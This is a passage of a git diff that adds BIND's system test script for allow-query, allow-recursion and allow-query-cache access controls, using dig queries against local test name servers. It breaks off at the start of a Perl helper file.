ns3/named.conf diff --git a/bin/tests/system/allow-query/tests.sh b/bin/tests/system/allow-query/tests.sh new file mode 100644 index 0000000..41c7bb7 --- /dev/null +++ b/bin/tests/system/allow-query/tests.sh @@ -0,0 +1,688 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Test of allow-query statement. +# allow-query takes an address match list and can be included in either the +# options statement or in the zone statement. This test assumes that the +# acl tests cover the details of the address match list and uses a limited +# number of address match test cases to ensure that allow-query finds the +# expected match. +# Test list: +# In options: +# default (any), any, none, [localhost, localnets], +# allowed address, not allowed address, denied address, +# allowed key, not allowed key, denied key +# allowed acl, not allowed acl, denied acl (acls pointing to addresses) +# +# Each of these tests requires changing to a new configuration +# file and using rndc to update the server +# +# In view, with nothing in options (default to any) +# default (any), any, none, [localhost, localnets], +# allowed address, not allowed address, denied address, +# allowed key, not allowed key, denied key +# allowed acl, not allowed acl, denied acl (acls pointing to addresses) +# +# In view, with options set to none, view set to any +# In view, with options set to any, view set to none +# +# In zone, with nothing in options (default to any) +# any, none, [localhost, localnets], +# allowed address, denied address, +# allowed key, not allowed key, denied key +# allowed acl, not allowed acl, denied acl (acls pointing to addresses), +# +# In zone, with options set to none, zone set to any +# In zone, with options set to any, zone set to none +# In zone, with view set to none, zone set to any +# In zone, with view set to any, zone set to none +# +# zone types of primary, secondary and stub can be tested in parallel by +# using multiple instances (ns2 as primary, ns3 as secondary, ns4 as stub) +# and querying as necessary. +# + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +nosea +nostat +nocmd +norec +noques +noauth +noadd +nostats +dnssec -p ${PORT}" + +status=0 +n=0 + +nextpart ns2/named.run > /dev/null + +# Test 1 - default, query allowed +n=`expr $n + 1` +echo_i "test $n: default - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 2 - explicit any, query allowed +n=`expr $n + 1` +copy_setports ns2/named02.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: explicit any - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 3 - none, query refused +n=`expr $n + 1` +copy_setports ns2/named03.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: none - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 4 - address allowed, query allowed +n=`expr $n + 1` +copy_setports ns2/named04.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: address allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 5 - address not allowed, query refused +n=`expr $n + 1` +copy_setports ns2/named05.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: address not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 6 - address disallowed, query refused +n=`expr $n + 1` +copy_setports ns2/named06.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: address disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 7 - acl allowed, query allowed +n=`expr $n + 1` +copy_setports ns2/named07.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: acl allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 8 - acl not allowed, query refused +n=`expr $n + 1` +copy_setports ns2/named08.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: acl not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + + +# Test 9 - acl disallowed, query refused +n=`expr $n + 1` +copy_setports ns2/named09.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: acl disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 10 - key allowed, query allowed +n=`expr $n + 1` +copy_setports ns2/named10.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: key allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y one:1234abcd8765 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 11 - key not allowed, query refused +n=`expr $n + 1` +copy_setports ns2/named11.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: key not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y two:1234efgh8765 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 12 - key disallowed, query refused +n=`expr $n + 1` +copy_setports ns2/named12.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: key disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y one:1234abcd8765 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# The next set of tests check if allow-query works in a view + +n=20 +# Test 21 - views default, query allowed +n=`expr $n + 1` +copy_setports ns2/named21.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views default - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 22 - views explicit any, query allowed +n=`expr $n + 1` +copy_setports ns2/named22.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views explicit any - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 23 - views none, query refused +n=`expr $n + 1` +copy_setports ns2/named23.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views none - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 24 - views address allowed, query allowed +n=`expr $n + 1` +copy_setports ns2/named24.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views address allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 25 - views address not allowed, query refused +n=`expr $n + 1` +copy_setports ns2/named25.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views address not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 26 - views address disallowed, query refused +n=`expr $n + 1` +copy_setports ns2/named26.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views address disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 27 - views acl allowed, query allowed +n=`expr $n + 1` +copy_setports ns2/named27.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views acl allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 28 - views acl not allowed, query refused +n=`expr $n + 1` +copy_setports ns2/named28.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views acl not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 29 - views acl disallowed, query refused +n=`expr $n + 1` +copy_setports ns2/named29.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views acl disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 30 - views key allowed, query allowed +n=`expr $n + 1` +copy_setports ns2/named30.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views key allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y one:1234abcd8765 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 31 - views key not allowed, query refused +n=`expr $n + 1` +copy_setports ns2/named31.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views key not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y two:1234efgh8765 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 32 - views key disallowed, query refused +n=`expr $n + 1` +copy_setports ns2/named32.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views key disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y one:1234abcd8765 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 33 - views over options, views allow, query allowed +n=`expr $n + 1` +copy_setports ns2/named33.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views over options, views allow - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 34 - views over options, views disallow, query refused +n=`expr $n + 1` +copy_setports ns2/named34.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views over options, views disallow - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Tests for allow-query in the zone statements + +n=40 + +# Test 41 - zone default, query allowed +n=`expr $n + 1` +copy_setports ns2/named40.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: zone default - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 42 - zone explicit any, query allowed +n=`expr $n + 1` +echo_i "test $n: zone explicit any - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.any.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.any.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 43 - zone none, query refused +n=`expr $n + 1` +echo_i "test $n: zone none - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.none.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.none.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 44 - zone address allowed, query allowed +n=`expr $n + 1` +echo_i "test $n: zone address allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.addrallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.addrallow.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 45 - zone address not allowed, query refused +n=`expr $n + 1` +echo_i "test $n: zone address not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.addrnotallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.addrnotallow.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 46 - zone address disallowed, query refused +n=`expr $n + 1` +echo_i "test $n: zone address disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.addrdisallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.addrdisallow.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 47 - zone acl allowed, query allowed +n=`expr $n + 1` +echo_i "test $n: zone acl allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.aclallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.aclallow.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 48 - zone acl not allowed, query refused +n=`expr $n + 1` +echo_i "test $n: zone acl not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.aclnotallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.aclnotallow.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 49 - zone acl disallowed, query refused +n=`expr $n + 1` +echo_i "test $n: zone acl disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.acldisallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.acldisallow.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 50 - zone key allowed, query allowed +n=`expr $n + 1` +echo_i "test $n: zone key allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y one:1234abcd8765 a.keyallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.keyallow.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 51 - zone key not allowed, query refused +n=`expr $n + 1` +echo_i "test $n: zone key not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y two:1234efgh8765 a.keyallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.keyallow.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 52 - zone key disallowed, query refused +n=`expr $n + 1` +echo_i "test $n: zone key disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y one:1234abcd8765 a.keydisallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.keydisallow.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 53 - zones over options, zones allow, query allowed +n=`expr $n + 1` +copy_setports ns2/named53.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views over options, views allow - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 54 - zones over options, zones disallow, query refused +n=`expr $n + 1` +copy_setports ns2/named54.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views over options, views disallow - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 55 - zones over views, zones allow, query allowed +n=`expr $n + 1` +copy_setports ns2/named55.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: zones over views, views allow - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 56 - zones over views, zones disallow, query refused +n=`expr $n + 1` +copy_setports ns2/named56.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: zones over views, views disallow - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 57 - zones over views, zones disallow, query refused (allow-query-on) +n=`expr $n + 1` +copy_setports ns2/named57.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: zones over views, allow-query-on" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.1.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.1.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.1.$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.aclnotallow.example a > dig.out.ns2.2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.2.$n > /dev/null || ret=1 +grep '^a.aclnotallow.example' dig.out.ns2.2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 58 - allow-recursion default +n=`expr $n + 1` +echo_i "test $n: default allow-recursion configuration" +ret=0 +$DIG -p ${PORT} @10.53.0.3 -b 127.0.0.1 a.normal.example a > dig.out.ns3.1.$n +grep 'status: NOERROR' dig.out.ns3.1.$n > /dev/null || ret=1 +$DIG -p ${PORT} @10.53.0.3 -b 10.53.0.1 a.normal.example a > dig.out.ns3.2.$n +grep 'status: REFUSED' dig.out.ns3.2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 59 - allow-query-cache default +n=`expr $n + 1` +echo_i "test $n: default allow-query-cache configuration" +ret=0 +$DIG -p ${PORT} @10.53.0.3 -b 127.0.0.1 ns . > dig.out.ns3.1.$n +grep 'status: NOERROR' dig.out.ns3.1.$n > /dev/null || ret=1 +$DIG -p ${PORT} @10.53.0.3 -b 10.53.0.1 ns . > dig.out.ns3.2.$n +grep 'status: REFUSED' dig.out.ns3.2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 60 - block recursion-on, allow query-cache-on +n=`expr $n + 1` +copy_setports ns3/named2.conf.in ns3/named.conf +rndc_reload ns3 10.53.0.3 + +echo_i "test $n: block recursion-on, allow query-cache-on" +ret=0 +# this should query the cache, and an answer should already be there +$DIG -p ${PORT} @10.53.0.3 a.normal.example a > dig.out.ns3.1.$n +grep 'recursion requested but not available' dig.out.ns3.1.$n > /dev/null || ret=1 +grep 'ANSWER: 1' dig.out.ns3.1.$n > /dev/null || ret=1 +# this should require recursion and therefore can't get an answer +$DIG -p ${PORT} @10.53.0.3 b.normal.example a > dig.out.ns3.2.$n +grep 'recursion requested but not available' dig.out.ns3.2.$n > /dev/null || ret=1 +grep 'ANSWER: 0' dig.out.ns3.2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 61 - inheritance of allow-query-cache-on from allow-recursion-on +n=`expr $n + 1` +copy_setports ns3/named3.conf.in ns3/named.conf +rndc_reload ns3 10.53.0.3 + +echo_i "test $n: inheritance of allow-query-cache-on" +ret=0 +# this should query the cache, an answer should already be there +$DIG -p ${PORT} @10.53.0.3 a.normal.example a > dig.out.ns3.1.$n +grep 'ANSWER: 1' dig.out.ns3.1.$n > /dev/null || ret=1 +# this should be refused due to allow-recursion-on/allow-query-cache-on +$DIG -p ${PORT} @10.53.1.2 a.normal.example a > dig.out.ns3.2.$n +grep 'recursion requested but not available' dig.out.ns3.2.$n > /dev/null || ret=1 +grep 'status: REFUSED' dig.out.ns3.2.$n > /dev/null || ret=1 +# this should require recursion and should be allowed +$DIG -p ${PORT} @10.53.0.3 c.normal.example a > dig.out.ns3.3.$n +grep 'ANSWER: 1' dig.out.ns3.3.$n > /dev/null || ret=1 +# this should require recursion and be refused +$DIG -p ${PORT} @10.53.1.2 d.normal.example a > dig.out.ns3.4.$n +grep 'recursion requested but not available' dig.out.ns3.4.$n > /dev/null || ret=1 +grep 'status: REFUSED' dig.out.ns3.4.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 62 - inheritance of allow-recursion-on from allow-query-cache-on +n=`expr $n + 1` +copy_setports ns3/named4.conf.in ns3/named.conf +rndc_reload ns3 10.53.0.3 + +echo_i "test $n: inheritance of allow-recursion-on" +ret=0 +# this should query the cache, an answer should already be there +$DIG -p ${PORT} @10.53.0.3 a.normal.example a > dig.out.ns3.1.$n +grep 'ANSWER: 1' dig.out.ns3.1.$n > /dev/null || ret=1 +# this should be refused due to allow-recursion-on/allow-query-cache-on +$DIG -p ${PORT} @10.53.1.2 a.normal.example a > dig.out.ns3.2.$n +grep 'recursion requested but not available' dig.out.ns3.2.$n > /dev/null || ret=1 +grep 'status: REFUSED' dig.out.ns3.2.$n > /dev/null || ret=1 +# this should require recursion and should be allowed +$DIG -p ${PORT} @10.53.0.3 e.normal.example a > dig.out.ns3.3.$n +grep 'ANSWER: 1' dig.out.ns3.3.$n > /dev/null || ret=1 +# this should require recursion and be refused +$DIG -p ${PORT} @10.53.1.2 f.normal.example a > dig.out.ns3.4.$n +grep 'recursion requested but not available' dig.out.ns3.4.$n > /dev/null || ret=1 +grep 'status: REFUSED' dig.out.ns3.4.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/ans.pl b/bin/tests/system/ans.pl new file mode 100644 index 0000000..446316f --- /dev/null +++ b/bin/tests/system/ans.pl @@ -0,0 +1,531 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# 